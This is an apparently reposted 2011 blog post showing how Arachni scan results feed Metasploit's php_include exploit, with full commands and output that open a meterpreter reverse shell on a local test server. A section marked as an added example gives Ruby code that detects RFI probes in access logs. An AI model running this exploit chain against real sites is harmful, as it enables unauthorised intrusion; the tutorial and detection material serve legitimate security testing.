Friday, January 7, 2011

WebApp audit and exploitation with Arachni and Metasploit

Regarding Arachni/Metasploit integration:
Arachni won’t replace WMAP; however, the MSF team will put a lot of work into making Arachni and the MSF able to play together.

This means you’ll be able to save a new kind of Arachni report, currently called “ArachniMetareport”, and then load it using an MSF plug-in (or a database importer; we’ll see).
Either way, the workflow will be the following:

* You scan a website with Arachni
* You load the “ArachniMetareport” using Metasploit
* You choose one of the available exploits and payloads
* You PWN!

Arachni is already good to go, but a lot of work will need to go into Metasploit’s generic webapp modules to make them able to exploit a wide range of vulnerabilities and vectors.
Sadly, only very simple GET parameters can be exploited at the moment, though that may change with the new Metasploit Pro release, which is also aimed towards webapp security.
In the meantime, here is an Arachni plug-in for the MSF as a proof-of-concept.



Step 1: Scan with Arachni


 $ ./arachni.rb -g --mods=simple_rfi http://127.0.0.2/~zapotek/tests/links/rfi.php --report=metareport --repsave=metasploit

Arachni - Web Application Security Scanner Framework v0.2 [0.1.7]
       Author: Tasos "Zapotek" Laskos
                                     
               (With the support of the community and the Arachni Team.)

       Website:       http://github.com/Zapotek/arachni
       Documentation: http://github.com/Zapotek/arachni/wiki

 [*] Initing...

 [-] [HTTP: 200] http://127.0.0.2/~zapotek/tests/links/rfi.php
 [-] SimpleRFI: Auditing link variable 'rfi' of http://127.0.0.2/~zapotek/tests/links/rfi.php
 [-] SimpleRFI: Auditing link variable 'rfi' of http://127.0.0.2/~zapotek/tests/links/rfi.php
 [-] SimpleRFI: Auditing link variable 'rfi' of http://127.0.0.2/~zapotek/tests/links/rfi.php
 [-] SimpleRFI: Auditing link variable 'rfi' of http://127.0.0.2/~zapotek/tests/links/rfi.php
 [-] Harvesting HTTP responses...
 [-] Depending on server responsiveness and network conditions this may take a while.
 [-] SimpleRFI: Analyzing response #1...
 [-] SimpleRFI: Analyzing response #3...
 [-] SimpleRFI: Analyzing response #0...
 [+] SimpleRFI: In link var 'rfi'  ( http://127.0.0.2/~zapotek/tests/links/rfi.php?d5053f4d0c42664c32cbbb266dbbbf7e85cb44b803de379448a1fceff6ae1204=&rfi=hTtP%3A%2F%2Fgoogle.com )
 [-] SimpleRFI: Analyzing response #2...
 [+] SimpleRFI: In link var 'rfi'  ( http://127.0.0.2/~zapotek/tests/links/rfi.php?d5053f4d0c42664c32cbbb266dbbbf7e85cb44b803de379448a1fceff6ae1204=&rfi=hTtP%3A%2F%2Fgoogle.com )

 [-] [HTTP: 200] http://127.0.0.2/~zapotek/tests/links/rfi.php?rfi=rfi
 [-] Harvesting HTTP responses...
 [~] Depending on server responsiveness and network conditions this may take a while.

 [~] Sent 4 requests.
 [~] Received and analyzed 4 responses.
 [~] In 00:00:00 ( 0.35381847 seconds ).
 [~] Average: 11 requests/second.

 [-] Creating file for the Metasploit framework.
 [-] Saved in 'metasploit.afr.msf'.

 [-] Dumping audit results in 'metasploit.afr'.
 [-] Done!

 [~] Sent 4 requests.
 [~] Received and analyzed 4 responses.
 [~] In 00:00:00 ( 0.35381847 seconds ).
 [~] Average: 11 requests/second.



Step 2: Load Metasploit


$ ./msfconsole

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|                                                                                                                                         

       =[ metasploit v3.5.0-dev [core:3.5 api:1.0]
+ -- --=[ 612 exploits - 306 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r10756 updated today (2010.10.19)

msf > load arachni
[-] Arachni plugin loaded.
[-] Successfully loaded plugin: Arachni
msf > arachni_load_metareport ../arachni/metasploit.afr.msf
[-] Loading report...

Available exploits:
  unix/webapp/php_include
msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > set PAYLOAD php/meterpreter_reverse_tcp
PAYLOAD => php/meterpreter_reverse_tcp
msf exploit(php_include) > show options

Module options:

   Name      Current Setting                                                         Required  Description
   ----      ---------------                                                         --------  -----------
   PATH      /                                                                       yes       The base directory to prepend to the URL to try
   PHPRFIDB  /home/zapotek/workspace/metasploit/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
   PHPURI    /~zapotek/tests/links/rfi.php?rfi=XXpathXX                              no        The URI to request, with the include parameter changed to XXpathXX
   Proxies                                                                           no        Use a proxy chain
   RHOST     127.0.0.2                                                               yes       The target address
   RPORT     80                                                                      yes       The target port
   SRVHOST   127.0.0.2                                                               yes       The local host to listen on.
   SRVPORT   1212                                                                    yes       The local port to listen on.
   URIPATH                                                                           no        The URI to use for this exploit (default is random)
   VHOST                                                                             no        HTTP server virtual host

Payload options (php/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(php_include) > exploit

[-] Started reverse handler on 127.0.0.1:4444
[-] Using URL: http://127.0.0.2:1212/gPgbBVJU
[-] PHP include server started.
[_] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:47847) at 2010-10-20 06:22:21 +0100

meterpreter > ls

Listing: /home/zapotek/workspace/arachni/tests/links
====================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  304   fil   2010-10-06 20:07:00 +0100  redirect.php
100644/rw-r--r--  280   fil   2010-10-15 02:15:47 +0100  rfi.php
100644/rw-r--r--  958   fil   2010-10-12 22:41:23 +0100  sqli.php
100644/rw-r--r--  285   fil   2010-10-03 19:56:19 +0100  xss.php

meterpreter >



As you can see, all datastore options have been set automatically; all you need to do is set your favourite payload and PWN!
This isn’t very impressive right now, but in the near future you’ll be able to exploit very complex and hard-to-find vulnerabilities with virtually no hassle at all, including vulnerabilities ranging from simple link variables to convoluted HTTP header fields.

Put simply: Arachni will provide the context and Metasploit will provide the muscle.
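As an added example (not part of the post, and not code from Arachni or Metasploit), here is the defender's view of the same finding: a small Ruby check that reads web-server access-log lines and flags query parameters whose decoded value is an absolute URL, which is the footprint an RFI probe such as SimpleRFI's leaves behind. The log lines are constructed for this example, modelled on the hosts and paths in the session above. Note the mixed-case scheme (hTtP://) in the scan output: a case-sensitive match on "http://" would miss it, while PHP's stream wrappers still accept it, so the check downcases before matching and URL-decodes the value the way PHP does when it fills $_GET.

```ruby
require 'cgi'

# Constructed Apache "combined" log lines modelled on the post's session
# (127.0.0.2 web root, ~zapotek/tests/links/*.php); not real server logs.
SAMPLE_LOG = <<~LOG
  127.0.0.1 - - [20/Oct/2010:06:20:01 +0100] "GET /~zapotek/tests/links/rfi.php?rfi=rfi HTTP/1.1" 200 280 "-" "Arachni/0.2"
  127.0.0.1 - - [20/Oct/2010:06:20:02 +0100] "GET /~zapotek/tests/links/rfi.php?rfi=hTtP%3A%2F%2Fgoogle.com HTTP/1.1" 200 1302 "-" "Arachni/0.2"
  127.0.0.1 - - [20/Oct/2010:06:22:21 +0100] "GET /~zapotek/tests/links/rfi.php?rfi=http://127.0.0.2:1212/gPgbBVJU HTTP/1.1" 200 512 "-" "Mozilla/5.0"
  127.0.0.1 - - [20/Oct/2010:06:22:30 +0100] "GET /~zapotek/tests/links/redirect.php?to=http%3A%2F%2Fexample.org%2Fpage HTTP/1.1" 302 0 "-" "Mozilla/5.0"
  127.0.0.1 - - [20/Oct/2010:06:22:31 +0100] "GET /~zapotek/tests/links/sqli.php?id=1 HTTP/1.1" 200 958 "-" "Mozilla/5.0"
LOG

# A value that starts with a URL scheme, matched case-insensitively so that
# "hTtP://" is caught just like "http://". The optional user@ part is skipped
# when extracting the host.
REMOTE_URL = %r{\A\s*(?<scheme>[a-z][a-z0-9+.-]*)://(?:[^@/?#]+@)?(?<host>[^/:?#]+)}i

# Pull method, path and query string out of one log line.
# Returns nil for lines that do not carry an HTTP request line.
def parse_request(line)
  m = line.match(%r{"(?<method>[A-Z]+) (?<target>\S+) HTTP/[\d.]+"})
  return nil unless m
  path, query = m[:target].split('?', 2)
  { method: m[:method], path: path, query: query.to_s }
end

# Split a query string into [name, decoded_value] pairs. CGI.unescape decodes
# %XX sequences and '+', which is what PHP does before populating $_GET.
def decode_params(query)
  query.split('&').map do |pair|
    name, value = pair.split('=', 2)
    [CGI.unescape(name.to_s), CGI.unescape(value.to_s)]
  end
end

# Return every parameter across the log that carried an absolute URL.
# Each finding records the line number, endpoint, parameter, raw value and host.
def scan_log(text)
  findings = []
  text.each_line.with_index(1) do |line, n|
    req = parse_request(line) or next
    decode_params(req[:query]).each do |name, value|
      m = value.match(REMOTE_URL) or next
      findings << { line: n, path: req[:path], param: name,
                    value: value.strip, scheme: m[:scheme].downcase, host: m[:host] }
    end
  end
  findings
end

# Count findings per endpoint/parameter pair so the noisy ones (e.g. a redirect
# parameter that legitimately carries URLs) can be triaged separately from an
# include-style parameter that should never receive one.
def summarize(findings)
  findings.each_with_object(Hash.new(0)) do |f, h|
    h["#{f[:path]}[#{f[:param]}]"] += 1
  end
end

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each do |f|
    puts "line #{f[:line]}: #{f[:path]} param=#{f[:param]} -> #{f[:scheme]}://#{f[:host]}"
  end
  summarize(scan_log(SAMPLE_LOG)).each { |k, v| puts "#{k}: #{v}" }
end
```

Run it as a script and it lists the three URL-bearing requests and their per-parameter counts; the rfi=rfi probe and the id=1 request are not flagged because their values never parse as a URL. On real logs, pair the endpoint/parameter summary with the scanner's own report: a parameter the report marks as an include vector should appear here with zero legitimate URL traffic.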

What’s best is that all of this power will be available to anyone who needs it and for that you have to thank the beauty of Open Source software.

source = outlaws
posted by h2h3h4
